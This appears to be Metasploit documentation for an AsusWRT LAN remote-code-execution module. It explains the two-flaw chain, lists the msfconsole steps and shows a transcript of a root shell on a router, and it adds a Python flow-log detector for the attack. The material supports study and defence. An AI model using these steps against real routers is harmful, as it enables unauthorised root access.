## Description

  This module chains two flaws in AsusWRT, reachable from the LAN side of the router, to execute arbitrary commands as `root`.


## Vulnerable Application

  The HTTP server in AsusWRT has a flaw that allows an unauthenticated client to perform an HTTP `POST` in certain cases. This can be combined with a second flaw in the VPN configuration upload routine, which sets NVRAM configuration variables directly from the fields of the `POST` request, to turn on a special command mode (the `ateCommand_flag` NVRAM variable seen in the module output below).

  Once that command mode is enabled, a single UDP packet to the infosvr service, which listens on UDP port 9999 on the LAN interface, launches the Telnet daemon on a random TCP port. Connecting to that port yields an interactive remote shell as the `root` user.
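  The two network stages described above (a datagram to UDP 9999 on the router, then a TCP connection from the same host to an unexpected high port a few seconds later) are visible to anything that sees LAN flow records. The following Python heuristic is an added example, not code from the Metasploit module or its documentation: it runs that detection over constructed flow records modelled on the session below. The flow-record format, the list of ports a router is expected to serve, and the 30-second correlation window are assumptions made for this example.

```python
"""Flow-log heuristic for the AsusWRT infosvr -> telnetd chain.

Added example (not part of the Metasploit module or its docs).
Assumed record format, one flow per line:
    "<epoch_seconds> <proto> <src_ip> <dst_ip> <dst_port>"
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple

INFOSVR_PORT = 9999          # infosvr listens here on the LAN interface (from the module docs)
WINDOW_SECONDS = 30.0        # the module sleeps 10 s before connecting; allow slack (assumption)
# TCP ports a home router is normally expected to serve (assumption for the example)
EXPECTED_ROUTER_TCP = {22, 23, 53, 80, 443, 8443}


@dataclass(frozen=True)
class Flow:
    ts: float
    proto: str
    src: str
    dst: str
    dport: int


def parse_flow(line: str) -> Flow:
    """Parse one constructed flow record into a Flow."""
    ts, proto, src, dst, dport = line.split()
    return Flow(float(ts), proto.lower(), src, dst, int(dport))


def find_infosvr_chains(lines: Iterable[str], router_ip: str,
                        window: float = WINDOW_SECONDS) -> List[Tuple[str, int, float]]:
    """Return (client_ip, telnet_port, seconds_after_probe) for every client that
    sent UDP to the router's infosvr port and then opened a TCP connection to a
    non-standard high port on the router within `window` seconds."""
    flows = sorted((parse_flow(l) for l in lines if l.strip()), key=lambda f: f.ts)
    last_probe: Dict[str, float] = {}   # most recent UDP/9999 datagram per client
    hits: List[Tuple[str, int, float]] = []
    for f in flows:
        if f.dst != router_ip:
            continue
        if f.proto == "udp" and f.dport == INFOSVR_PORT:
            last_probe[f.src] = f.ts
        elif f.proto == "tcp" and f.dport >= 1024 and f.dport not in EXPECTED_ROUTER_TCP:
            t0 = last_probe.get(f.src)
            if t0 is not None and 0.0 <= f.ts - t0 <= window:
                hits.append((f.src, f.dport, f.ts - t0))
    return hits


# Constructed sample records, modelled on the session transcript in the Scenarios
# section (attacker 192.168.135.111, router 192.168.132.205, telnetd on 51332).
SAMPLE_FLOWS = [
    "1516913400 tcp 192.168.132.10 192.168.132.205 80",      # benign admin UI use
    "1516913410 udp 192.168.132.10 192.168.132.205 9999",    # lone infosvr query, no follow-up
    "1516913460 tcp 192.168.135.111 192.168.132.205 80",     # attacker's POST to the HTTP portal
    "1516913462 udp 192.168.135.111 192.168.132.205 9999",   # command packet to infosvr
    "1516913472 tcp 192.168.135.111 192.168.132.205 51332",  # telnetd on a random port, 10 s later
    "1516913500 tcp 192.168.132.20 192.168.132.205 8443",    # expected port, not flagged
    "1516913900 tcp 192.168.132.10 192.168.132.205 60000",   # high port, but probe was 490 s ago
]


def sample_hits() -> List[Tuple[str, int, float]]:
    """Run the heuristic over the constructed sample."""
    return find_infosvr_chains(SAMPLE_FLOWS, "192.168.132.205")


if __name__ == "__main__":
    for src, port, delta in sample_hits():
        print(f"ALERT: {src} hit infosvr then connected to TCP/{port} {delta:.0f}s later")
```

Only the attacker's sequence is reported; the lone infosvr query and the late high-port connection from 192.168.132.10 fall outside the window. The same correlation can be tightened by also requiring an HTTP `POST` to the portal from the same client shortly before the datagram, since that is the stage that sets `ateCommand_flag`.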

  This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.

  Numerous other ASUS models are reportedly affected but were not tested.


## Verification Steps

  1. Start `msfconsole`
  2. `use exploit/linux/http/asuswrt_lan_rce`
  3. `set RHOST [IP]`
  4. `run`
  5. You should get a *root* session


## Options

  **ASUSWRTPORT**

  AsusWRT HTTP portal port (default: `80`)


## Scenarios
```
msf > use exploit/linux/http/asuswrt_lan_rce
msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205
rhost => 192.168.132.205
msf exploit(linux/http/asuswrt_lan_rce) > run

[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable.
[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332
[+] 192.168.132.205:9999 - Success, shell incoming!
[*] Found shell.
[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600

id
id
/bin/sh: id: not found
/ # cat /proc/cpuinfo
cat /proc/cpuinfo
system type             : Broadcom BCM53572 chip rev 1 pkg 8
processor               : 0
cpu model               : MIPS 74K V4.9
BogoMIPS                : 149.91
wait instruction        : no
microsecond timers      : yes
tlb_entries             : 32
extra interrupt vector  : no
hardware watchpoint     : yes
ASEs implemented        : mips16 dsp
shadow register sets    : 1
VCED exceptions         : not available
VCEI exceptions         : not available

unaligned_instructions  : 0
dcache hits             : 2147483648
dcache misses           : 0
icache hits             : 2147483648
icache misses           : 0
instructions            : 2147483648
/ #
```
